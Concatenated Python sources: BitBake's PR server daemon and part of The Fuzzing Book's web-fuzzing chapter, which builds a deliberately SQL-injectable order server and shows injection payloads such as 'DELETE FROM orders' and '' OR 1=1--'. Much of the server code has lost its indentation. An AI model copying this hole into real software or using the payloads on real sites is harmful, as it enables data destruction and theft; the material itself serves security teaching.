        with open(os.path.join(sys.path[0], 'user', 'config.json'), 'r') as file:
            settingsdata = json.load(file)
        if settingsdata['force close']:  # recommended - not all threads close when this is turned off (hopefully this will be fixed in the future)
            os._exit(0)
        else:
            sys.exit(0)
    def get_network_client(self):
        """Return the current network client (UI trigger accessor)."""
        return self.client
if __name__ == '__main__':
App() |
serv.py | import os,sys,logging
import signal, time
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
import threading
import queue
import socket
import io
import sqlite3
import bb.server.xmlrpcclient
import prserv
import prserv.db
import errno
import select
logger = logging.getLogger("BitBake.PRserv")
# NOTE(review): this guard targets Python >= 2.6, but the module already
# imports xmlrpc.server / queue (Python 3-only names), so the check can
# likely never fire on an interpreter that got this far.
if sys.hexversion < 0x020600F0:
    print("Sorry, python 2.6 or later is required.")
    sys.exit(1)
class Handler(SimpleXMLRPCRequestHandler):
    """XML-RPC request handler that dispatches through the server's
    ``funcs`` table instead of instance attributes."""

    def _dispatch(self, method, params):
        """Look up *method* in self.server.funcs and call it with *params*.

        Any exception is printed with its traceback before being re-raised
        so the XML-RPC layer can report a fault to the client.
        """
        try:
            result = self.server.funcs[method](*params)
        except:
            import traceback
            traceback.print_exc()
            raise
        else:
            return result
# Template for the daemon pid file, filled in with (host, port).
PIDPREFIX = "/tmp/PRServer_%s_%s.pid"

# Module-level handle for the single running server instance.
singleton = None
class PRServer(SimpleXMLRPCServer):
def __init__(self, dbfile, logfile, interface, daemon=True):
    ''' constructor

    Binds the XML-RPC server to *interface* (host, port), registers the
    PR-service methods, and prepares the request queue plus the worker
    thread that will serve it (started elsewhere).  Raises
    PRServiceConfigError when the socket cannot be bound.
    '''
    try:
        SimpleXMLRPCServer.__init__(self, interface,
                                    logRequests=False, allow_none=True)
    except socket.error:
        ip = socket.gethostbyname(interface[0])
        port = interface[1]
        msg = "PR Server unable to bind to %s:%s\n" % (ip, port)
        sys.stderr.write(msg)
        raise PRServiceConfigError

    self.dbfile = dbfile
    self.daemon = daemon
    self.logfile = logfile
    self.working_thread = None
    # actual bound address (port may have been 0 -> ephemeral)
    self.host, self.port = self.socket.getsockname()
    self.pidfile = PIDPREFIX % (self.host, self.port)

    self.register_function(self.getPR, "getPR")
    self.register_function(self.quit, "quit")
    self.register_function(self.ping, "ping")
    self.register_function(self.export, "export")
    self.register_function(self.dump_db, "dump_db")
    self.register_function(self.importone, "importone")
    self.register_introspection_functions()

    # pipe used to signal shutdown to the select loop
    self.quitpipein, self.quitpipeout = os.pipe()

    # requests are queued here and served by the handler thread
    self.requestqueue = queue.Queue()
    self.handlerthread = threading.Thread(target = self.process_request_thread)
    self.handlerthread.daemon = False
def process_request_thread(self):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
iter_count = 1
# 60 iterations between syncs or sync if dirty every ~30 seconds
iterations_between_sync = 60
bb.utils.set_process_name("PRServ Handler")
while not self.quitflag:
try:
(request, client_address) = self.requestqueue.get(True, 30)
except queue.Empty:
self.table.sync_if_dirty()
continue
if request is None:
continue
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
iter_count = (iter_count + 1) % iterations_between_sync
if iter_count == 0:
self.table.sync_if_dirty()
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
self.table.sync()
self.table.sync_if_dirty()
def sigint_handler(self, signum, stack):
if self.table:
self.table.sync()
def sigterm_handler(self, signum, stack):
if self.table:
self.table.sync()
self.quit()
self.requestqueue.put((None, None))
def process_request(self, request, client_address):
self.requestqueue.put((request, client_address))
def export(self, version=None, pkgarch=None, checksum=None, colinfo=True):
try:
return self.table.export(version, pkgarch, checksum, colinfo)
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def dump_db(self):
"""
Returns a script (string) that reconstructs the state of the
entire database at the time this function is called. The script
language is defined by the backing database engine, which is a
function of server configuration.
Returns None if the database engine does not support dumping to
script or if some other error is encountered in processing.
"""
buff = io.StringIO()
try:
self.table.sync()
self.table.dump_db(buff)
return buff.getvalue()
except Exception as exc:
logger.error(str(exc))
return None
finally:
buff.close()
def importone(self, version, pkgarch, checksum, value):
return self.table.importone(version, pkgarch, checksum, value)
def ping(self):
return not self.quitflag
def getinfo(self):
return (self.host, self.port)
def getPR(self, version, pkgarch, checksum):
try:
return self.table.getValue(version, pkgarch, checksum)
except prserv.NotFoundError:
logger.error("can not find value for (%s, %s)",version, checksum)
return None
except sqlite3.Error as exc:
logger.error(str(exc))
return None
def quit(self):
self.quitflag=True
os.write(self.quitpipeout, b"q")
os.close(self.quitpipeout)
return
def work_forever(self,):
self.quitflag = False
# This timeout applies to the poll in TCPServer, we need the select
# below to wake on our quit pipe closing. We only ever call into handle_request
# if there is data there.
self.timeout = 0.01
bb.utils.set_process_name("PRServ")
# DB connection must be created after all forks
self.db = prserv.db.PRData(self.dbfile)
self.table = self.db["PRMAIN"]
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(os.getpid())))
self.handlerthread.start()
while not self.quitflag:
ready = select.select([self.fileno(), self.quitpipein], [], [], 30)
if self.quitflag:
break
if self.fileno() in ready[0]:
self.handle_request()
self.handlerthread.join()
self.db.disconnect()
logger.info("PRServer: stopping...")
self.server_close()
os.close(self.quitpipein)
return
def start(self):
if self.daemon:
pid = self.daemonize()
else:
pid = self.fork()
self.pid = pid
# Ensure both the parent sees this and the child from the work_forever log entry above
logger.info("Started PRServer with DBfile: %s, IP: %s, PORT: %s, PID: %s" %
(self.dbfile, self.host, self.port, str(pid)))
def delpid(self):
os.remove(self.pidfile)
def daemonize(self):
"""
See Advanced Programming in the UNIX, Sec 13.3
"""
try:
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
#parent return instead of exit to give control
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
os.setsid()
"""
fork again to make sure the daemon is not session leader,
which prevents it from acquiring controlling terminal
"""
try:
pid = os.fork()
if pid > 0: #parent
os._exit(0)
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
self.cleanup_handles()
os._exit(0)
def fork(self):
try:
pid = os.fork()
if pid > 0:
return pid
except OSError as e:
raise Exception("%s [%d]" % (e.strerror, e.errno))
bb.utils.signal_on_parent_exit("SIGTERM")
self.cleanup_handles()
os._exit(0)
def cleanup_handles(self):
signal.signal(signal.SIGINT, self.sigint_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
os.chdir("/")
sys.stdout.flush()
sys.stderr.flush()
# We could be called from a python thread with io.StringIO as
# stdout/stderr or it could be 'real' unix fd forking where we need
# to physically close the fds to prevent the program launching us from
# potentially hanging on a pipe. Handle both cases.
si = open('/dev/null', 'r')
try:
os.dup2(si.fileno(),sys.stdin.fileno())
except (AttributeError, io.UnsupportedOperation):
sys.stdin = si
so = open(self.logfile, 'a+')
try:
os.dup2(so.fileno(),sys.stdout.fileno())
except (AttributeError, io.UnsupportedOperation):
sys.stdout = so
try:
os.dup2(so.fileno(),sys.stderr.fileno())
except (AttributeError, io.UnsupportedOperation):
sys.stderr = so
# Clear out all log handlers prior to the fork() to avoid calling
# event handlers not part of the PRserver
for logger_iter in logging.Logger.manager.loggerDict.keys():
logging.getLogger(logger_iter).handlers = []
# Ensure logging makes it to the logfile
streamhandler = logging.StreamHandler()
streamhandler.setLevel(logging.DEBUG)
formatter = bb.msg.BBLogFormatter("%(levelname)s: %(message)s")
streamhandler.setFormatter(formatter)
logger.addHandler(streamhandler)
# write pidfile
pid = str(os.getpid())
pf = open(self.pidfile, 'w')
pf.write("%s\n" % pid)
pf.close()
self.work_forever()
self.delpid()
class PRServSingleton(object):
    """Lazily-started, process-wide wrapper around a single PRServer."""
    def __init__(self, dbfile, logfile, interface):
        """Record the configuration; the server itself is not started yet."""
        self.dbfile, self.logfile, self.interface = dbfile, logfile, interface
        self.host = None
        self.port = None
    def start(self):
        """Fork a non-daemonized PRServer and remember the address it bound."""
        self.prserv = PRServer(self.dbfile, self.logfile, self.interface, daemon=False)
        self.prserv.start()
        self.host, self.port = self.prserv.getinfo()
    def getinfo(self):
        """Return (host, port) of the running server, or (None, None) before start()."""
        return (self.host, self.port)
class PRServerConnection(object):
    """Thin XML-RPC client proxy for a (possibly local singleton) PR server."""
    def __init__(self, host, port):
        # "localhost" with port 0/None is shorthand for the auto-started singleton
        if is_local_special(host, port):
            host, port = singleton.getinfo()
        self.host = host
        self.port = port
        self.connection, self.transport = bb.server.xmlrpcclient._create_server(self.host, self.port)
    def terminate(self):
        """Ask the remote server to quit; failures are reported, not raised."""
        try:
            logger.info("Terminating PRServer...")
            self.connection.quit()
        except Exception as exc:
            sys.stderr.write("%s\n" % str(exc))
    def getPR(self, version, pkgarch, checksum):
        """Fetch (possibly allocating) the PR value for the given triple."""
        return self.connection.getPR(version, pkgarch, checksum)
    def ping(self):
        """True while the remote server is up and accepting requests."""
        return self.connection.ping()
    def export(self, version=None, pkgarch=None, checksum=None, colinfo=True):
        """Export the matching rows from the remote database."""
        return self.connection.export(version, pkgarch, checksum, colinfo)
    def dump_db(self):
        """Return an SQL script reconstructing the remote database."""
        return self.connection.dump_db()
    def importone(self, version, pkgarch, checksum, value):
        """Insert a single exported value into the remote database."""
        return self.connection.importone(version, pkgarch, checksum, value)
    def getinfo(self):
        """Return the (host, port) this connection points at."""
        return self.host, self.port
def start_daemon(dbfile, host, port, logfile):
    """Start a daemonized PRServer for host:port.

    Refuses to start when a pidfile for that address already exists.
    Returns 0 on success, 1 when a server already appears to be running.
    """
    ip = socket.gethostbyname(host)
    pidfile = PIDPREFIX % (ip, port)
    try:
        with open(pidfile, 'r') as pf:
            pid = int(pf.readline().strip())
    except IOError:
        pid = None
    if pid:
        sys.stderr.write("pidfile %s already exist. Daemon already running?\n"
                            % pidfile)
        return 1
    server = PRServer(os.path.abspath(dbfile), os.path.abspath(logfile), (ip,port))
    server.start()
    # Sometimes, the port (i.e. localhost:0) indicated by the user does not match with
    # the one the server actually is listening, so at least warn the user about it
    _, rport = server.getinfo()
    if port != rport:
        sys.stdout.write("Server is listening at port %s instead of %s\n"
                         % (rport,port))
    return 0
def stop_daemon(host, port):
    """Stop the PR server at host:port.

    Terminates via XML-RPC first, escalates to SIGTERM if the process
    lingers, then removes the pidfile.  Returns 0 on success, 1 when no
    matching pidfile exists.
    """
    import glob
    ip = socket.gethostbyname(host)
    pidfile = PIDPREFIX % (ip, port)
    try:
        pf = open(pidfile,'r')
        pid = int(pf.readline().strip())
        pf.close()
    except IOError:
        pid = None
    if not pid:
        # when server starts at port=0 (i.e. localhost:0), server actually takes another port,
        # so at least advise the user which ports the corresponding server is listening
        ports = []
        portstr = ""
        for pf in glob.glob(PIDPREFIX % (ip,'*')):
            bn = os.path.basename(pf)
            root, _ = os.path.splitext(bn)
            ports.append(root.split('_')[-1])
        if len(ports):
            portstr = "Wrong port? Other ports listening at %s: %s" % (host, ' '.join(ports))
        sys.stderr.write("pidfile %s does not exist. Daemon not running? %s\n"
                         % (pidfile,portstr))
        return 1
    try:
        # best-effort graceful shutdown over XML-RPC
        PRServerConnection(ip, port).terminate()
    except:
        logger.critical("Stop PRService %s:%d failed" % (host,port))
    try:
        if pid:
            wait_timeout = 0
            print("Waiting for pr-server to exit.")
            while is_running(pid) and wait_timeout < 50:
                time.sleep(0.1)
                wait_timeout += 1
            if is_running(pid):
                print("Sending SIGTERM to pr-server.")
                os.kill(pid,signal.SIGTERM)
                time.sleep(0.1)
        if os.path.exists(pidfile):
            os.remove(pidfile)
    except OSError as e:
        # Ignore only "no such process" (the server exited on its own).
        # The old check matched on str(e).find("No such process") <= 0,
        # which breaks on localized messages and wrongly re-raises when
        # the phrase happens to start at index 0 -- test errno directly.
        if e.errno != errno.ESRCH:
            raise
    return 0
def is_running(pid):
    """Return True if a process with the given pid exists.

    Uses signal 0 as a pure existence probe; permission errors (process
    exists but is owned by someone else) still count as running.
    """
    try:
        os.kill(pid, 0)
    except ProcessLookupError:   # ESRCH: no such process
        return False
    except OSError:
        pass
    return True
def is_local_special(host, port):
    """True for the special "localhost:0" address that selects the
    auto-started singleton server (any falsy port qualifies)."""
    return host.strip().lower() == "localhost" and not port
class PRServiceConfigError(Exception):
    """Raised when PRSERV_HOST is malformed or the PR service is unreachable."""
    pass
def auto_start(d):
    """Start (or connect to) the PR service configured in PRSERV_HOST.

    `d` is the BitBake datastore.  Returns "host:port" of a reachable
    server, None when no PRSERV_HOST is configured, and raises
    PRServiceConfigError on bad configuration or an unreachable server.
    """
    global singleton
    # Shutdown any existing PR Server
    auto_shutdown()
    host_params = list(filter(None, (d.getVar('PRSERV_HOST') or '').split(':')))
    if not host_params:
        # PR service not configured at all
        return None
    if len(host_params) != 2:
        logger.critical('\n'.join(['PRSERV_HOST: incorrect format',
                'Usage: PRSERV_HOST = "<hostname>:<port>"']))
        raise PRServiceConfigError
    if is_local_special(host_params[0], int(host_params[1])) and not singleton:
        # "localhost:0": start a private singleton server on an ephemeral port
        import bb.utils
        cachedir = (d.getVar("PERSISTENT_DIR") or d.getVar("CACHE"))
        if not cachedir:
            logger.critical("Please set the 'PERSISTENT_DIR' or 'CACHE' variable")
            raise PRServiceConfigError
        bb.utils.mkdirhier(cachedir)
        dbfile = os.path.join(cachedir, "prserv.sqlite3")
        logfile = os.path.join(cachedir, "prserv.log")
        singleton = PRServSingleton(os.path.abspath(dbfile), os.path.abspath(logfile), ("localhost",0))
        singleton.start()
    if singleton:
        host, port = singleton.getinfo()
    else:
        host = host_params[0]
        port = int(host_params[1])
    try:
        connection = PRServerConnection(host,port)
        connection.ping()
        # report the address actually bound (the requested port may have been 0)
        realhost, realport = connection.getinfo()
        return str(realhost) + ":" + str(realport)
    except Exception:
        logger.critical("PRservice %s:%d not available" % (host, port))
        raise PRServiceConfigError
def auto_shutdown():
    """Terminate and reap the auto-started singleton PR server, if any."""
    global singleton
    if singleton:
        host, port = singleton.getinfo()
        try:
            PRServerConnection(host, port).terminate()
        except:
            logger.critical("Stop PRService %s:%d failed" % (host,port))
        try:
            # reap the forked (non-daemon) server process
            os.waitpid(singleton.prserv.pid, 0)
        except ChildProcessError:
            # already reaped elsewhere
            pass
        singleton = None
def ping(host, port):
    """Return the ping() result of the PR server at host:port."""
    return PRServerConnection(host, port).ping()
|
WebFuzzer.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Testing Web Applications" - a chapter of "The Fuzzing Book"
# Web site: https://www.fuzzingbook.org/html/WebFuzzer.html
# Last change: 2022-02-03 14:31:04+01:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Fuzzing Book - Testing Web Applications
This file can be _executed_ as a script, running all experiments:
$ python WebFuzzer.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from fuzzingbook.WebFuzzer import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.fuzzingbook.org/html/WebFuzzer.html
This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.
### Fuzzing Web Forms
`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.
Here's the grammar extracted for our vulnerable Web server:
>>> web_form_fuzzer = WebFormFuzzer(httpd_url)
>>> web_form_fuzzer.grammar['']
['?']
>>> web_form_fuzzer.grammar['']
['/order']
>>> web_form_fuzzer.grammar['']
['&&&&&&']
Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.
>>> web_form_fuzzer.fuzz()
'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='
Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.
Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.
### SQL Injection Attacks
`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:
>>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
>>> sql_fuzzer.fuzz()
"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit="
As you can see, the path to be retrieved contains the payload encoded into one of the form field values.
Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.
`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.
For more details, source, and documentation, see
"The Fuzzing Book - Testing Web Applications"
at https://www.fuzzingbook.org/html/WebFuzzer.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'fuzzingbook'
# Testing Web Applications
# ========================
if __name__ == '__main__':
print('# Testing Web Applications')
if __name__ == '__main__':
from .bookutils import YouTubeVideo
YouTubeVideo('5agY5kg8Pvk')
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## A Web User Interface
## --------------------
if __name__ == '__main__':
print('\n## A Web User Interface')
### Excursion: Implementing a Web Server
if __name__ == '__main__':
print('\n### Excursion: Implementing a Web Server')
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.server import HTTPStatus # type: ignore
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
    """A simple HTTP server"""
    # Base definition only; request handling is layered on by the
    # subsequent same-named class redefinitions (notebook style).
    pass
#### Taking Orders
if __name__ == '__main__':
print('\n#### Taking Orders')
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
from typing import NoReturn, Tuple, Dict, List, Optional, Union
FUZZINGBOOK_SWAG = {
"tshirt": "One FuzzingBook T-Shirt",
"drill": "One FuzzingBook Rotary Hammer",
"lockset": "One FuzzingBook Lock Set"
}
HTML_ORDER_FORM = """
<html><body>
<form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Swag Order Form</strong>
<p>
Yes! Please send me at your earliest convenience
<select name="item">
"""
# (We don't use h2, h3, etc. here
# as they interfere with the notebook table of contents)
for item in FUZZINGBOOK_SWAG:
HTML_ORDER_FORM += \
'<option value="{item}">{name}</option>\n'.format(item=item,
name=FUZZINGBOOK_SWAG[item])
HTML_ORDER_FORM += """
</select>
<br>
<table>
<tr><td>
<label for="name">Name: </label><input type="text" name="name">
</td><td>
<label for="email">Email: </label><input type="email" name="email"><br>
</td></tr>
<tr><td>
<label for="city">City: </label><input type="text" name="city">
</td><td>
<label for="zip">ZIP Code: </label><input type="number" name="zip">
</tr></tr>
</table>
<input type="checkbox" name="terms"><label for="terms">I have read
the <a href="/terms">terms and conditions</a></label>.<br>
<input type="submit" name="submit" value="Place order">
</p>
</form>
</body></html>
"""
if __name__ == '__main__':
from IPython.display import display
from .bookutils import HTML
if __name__ == '__main__':
HTML(HTML_ORDER_FORM)
#### Order Confirmation
if __name__ == '__main__':
print('\n#### Order Confirmation')
HTML_ORDER_RECEIVED = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong>
<p id="confirmation">
We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>
A confirmation mail will be sent to {email}.
</p>
<p>
Want more swag? Use our <a href="/">order form</a>!
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_ORDER_RECEIVED.format(item_name="One FuzzingBook Rotary Hammer",
name="Jane Doe",
email="doe@example.com",
city="Seattle",
zip="98104"))
#### Terms and Conditions
if __name__ == '__main__':
print('\n#### Terms and Conditions')
HTML_TERMS_AND_CONDITIONS = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Terms and Conditions</strong>
<p>
The content of this project is licensed under the
<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons
Attribution-NonCommercial-ShareAlike 4.0 International License.</a>
</p>
<p>
To place an order, use our <a href="/">order form</a>.
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_TERMS_AND_CONDITIONS)
#### Storing Orders
if __name__ == '__main__':
print('\n#### Storing Orders')
import sqlite3
import os
ORDERS_DB = "orders.db"
def init_db():
    """(Re)create the orders database and return an open connection."""
    # start from a clean slate: discard any existing database file first
    if os.path.exists(ORDERS_DB):
        os.remove(ORDERS_DB)
    conn = sqlite3.connect(ORDERS_DB)
    conn.execute("DROP TABLE IF EXISTS orders")
    conn.execute("CREATE TABLE orders "
                 "(item text, name text, email text, "
                 "city text, zip text)")
    conn.commit()
    return conn
if __name__ == '__main__':
db = init_db()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("INSERT INTO orders " +
"VALUES ('lockset', 'Walter White', "
"'white@jpwynne.edu', 'Albuquerque', '87101')")
db.commit()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("DELETE FROM orders WHERE name = 'Walter White'")
db.commit()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
#### Handling HTTP Requests
if __name__ == '__main__':
print('\n#### Handling HTTP Requests')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def do_GET(self):
        """Route GET requests by path prefix; any error becomes a 500 page."""
        try:
            path = self.path
            if path == "/":
                self.send_order_form()
            elif path.startswith("/order"):
                self.handle_order()
            elif path.startswith("/terms"):
                self.send_terms_and_conditions()
            else:
                self.not_found()
        except Exception:
            self.internal_server_error()
##### Order Form
if __name__ == '__main__':
print('\n##### Order Form')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def send_order_form(self):
        """Serve the HTML order form (GET /) as a 200 response."""
        self.send_response(HTTPStatus.OK, "Place your order")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(HTML_ORDER_FORM.encode("utf8"))
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def send_terms_and_conditions(self):
        """Serve the terms-and-conditions page (GET /terms) as a 200 response."""
        self.send_response(HTTPStatus.OK, "Terms and Conditions")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode("utf8"))
##### Processing Orders
if __name__ == '__main__':
print('\n##### Processing Orders')
import urllib.parse
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def get_field_values(self):
        """Decode the request's query string into a {field: first_value} dict."""
        # Note: this fails to decode non-ASCII characters properly
        query_string = urllib.parse.urlparse(self.path).query
        # parse_qs maps each name to a LIST of values; keep only the first
        parsed = urllib.parse.parse_qs(query_string, keep_blank_values=True)
        return {name: entries[0] for name, entries in parsed.items()}
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def handle_order(self):
        """Parse the query string, persist the order, then confirm it."""
        values = self.get_field_values()
        self.store_order(values)
        self.send_order_received(values)
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def store_order(self, values):
        """Insert the order into the sqlite database.

        SECURITY: deliberately vulnerable (the point of this chapter) --
        form values are interpolated straight into the SQL string and run
        via executescript(), so crafted input can inject arbitrary SQL.
        Do not "fix" with parameterized queries; SQLInjectionFuzzer
        depends on this behavior.
        """
        db = sqlite3.connect(ORDERS_DB)
        # The following should be one line
        sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
        self.log_message("%s", sql_command)
        db.executescript(sql_command)
        db.commit()
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def send_order_received(self, values):
        """Serve the order confirmation page.

        Form values are substituted unescaped into the HTML (deliberate
        for the chapter's demos); a KeyError on an unknown item name
        propagates up to do_GET and yields a 500 response.
        """
        # Should use html.escape()
        values["item_name"] = FUZZINGBOOK_SWAG[values["item"]]
        confirmation = HTML_ORDER_RECEIVED.format(**values).encode("utf8")
        self.send_response(HTTPStatus.OK, "Order received")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(confirmation)
##### Other HTTP commands
if __name__ == '__main__':
print('\n##### Other HTTP commands')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def do_HEAD(self):
        """Answer any HEAD request with 200 and headers only (no body)."""
        # print("HEAD " + self.path)
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-type", "text/html")
        self.end_headers()
#### Error Handling
if __name__ == '__main__':
print('\n#### Error Handling')
##### Page Not Found
if __name__ == '__main__':
print('\n##### Page Not Found')
HTML_NOT_FOUND = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Sorry.</strong>
<p>
This page does not exist. Try our <a href="/">order form</a> instead.
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_NOT_FOUND)
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def not_found(self):
        """Serve the 404 page for unknown paths."""
        self.send_response(HTTPStatus.NOT_FOUND, "Not found")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(HTML_NOT_FOUND.encode("utf8"))
##### Internal Errors
if __name__ == '__main__':
print('\n##### Internal Errors')
HTML_INTERNAL_SERVER_ERROR = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Internal Server Error</strong>
<p>
The server has encountered an internal error. Go to our <a href="/">order form</a>.
<pre>{error_message}</pre>
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_INTERNAL_SERVER_ERROR)
import sys
import traceback
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def internal_server_error(self):
        """Serve a 500 page embedding the current traceback.

        Leaking the traceback to the client is intentional here -- the
        chapter's fuzzers look for it in responses.
        """
        self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")
        self.send_header("Content-type", "text/html")
        self.end_headers()
        # format_exc() picks up the exception currently being handled
        exc = traceback.format_exc()
        self.log_message("%s", exc.strip())
        message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)
        self.wfile.write(message.encode("utf8"))
#### Logging
if __name__ == '__main__':
print('\n#### Logging')
from multiprocess import Queue # type: ignore
HTTPD_MESSAGE_QUEUE = Queue()
HTTPD_MESSAGE_QUEUE.put("I am another message")
HTTPD_MESSAGE_QUEUE.put("I am one more message")
from .bookutils import rich_output, terminal_escape
def display_httpd_message(message: str) -> None:
    """Show a server log message: styled HTML in notebooks, plain text otherwise."""
    if not rich_output():
        print(terminal_escape(message))
        return
    display(
        HTML(
            '<pre style="background: NavajoWhite;">' +
            message +
            "</pre>"))
if __name__ == '__main__':
display_httpd_message("I am a httpd server message")
def print_httpd_messages():
    """Drain the server's message queue, displaying each entry in order."""
    while not HTTPD_MESSAGE_QUEUE.empty():
        display_httpd_message(HTTPD_MESSAGE_QUEUE.get())
import time
if __name__ == '__main__':
time.sleep(1)
print_httpd_messages()
def clear_httpd_messages() -> None:
    """Discard all queued server messages without displaying them."""
    while not HTTPD_MESSAGE_QUEUE.empty():
        HTTPD_MESSAGE_QUEUE.get()
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
    def log_message(self, format: str, *args) -> None:
        """Divert access-log lines to HTTPD_MESSAGE_QUEUE.

        The server runs in a separate process, so messages cross back to
        the notebook via the multiprocess queue instead of stderr.
        """
        message = ("%s - - [%s] %s\n" %
                   (self.address_string(),
                    self.log_date_time_string(),
                    format % args))
        HTTPD_MESSAGE_QUEUE.put(message)
import requests
def webbrowser(url: str, mute: bool = False) -> str:
    """Download and return the http/https resource given by the URL"""
    try:
        contents = requests.get(url).text
    finally:
        # show (or silently drop) whatever the server logged meanwhile
        if mute:
            clear_httpd_messages()
        else:
            print_httpd_messages()
    return contents
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Running the Server
if __name__ == '__main__':
print('\n### Running the Server')
def run_httpd_forever(handler_class: type) -> NoReturn:  # type: ignore
    """Serve `handler_class` on the first free port in 8800..8999 (blocking).

    Publishes the chosen URL on HTTPD_MESSAGE_QUEUE so the parent process
    can discover it, then serves requests until the process is killed.
    """
    host = "127.0.0.1"  # localhost IP
    for port in range(8800, 9000):
        httpd_address = (host, port)
        try:
            httpd = HTTPServer(httpd_address, handler_class)
            break
        except OSError:
            continue  # port in use; try the next one
    else:
        # Previously this fell through to an obscure NameError on `httpd`
        # when every port in the range was taken; fail loudly instead.
